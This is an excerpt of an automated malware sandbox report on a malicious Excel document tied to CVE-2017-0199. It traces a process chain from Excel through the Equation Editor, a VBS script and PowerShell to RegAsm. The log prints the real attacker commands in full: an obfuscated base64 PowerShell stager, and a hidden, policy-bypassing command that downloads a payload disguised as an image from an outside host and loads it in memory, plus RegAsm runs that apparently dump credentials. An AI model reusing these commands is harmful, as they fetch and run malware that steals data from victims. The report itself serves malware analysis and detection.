                  Source: RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxReversingLabs: Detection: 18%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
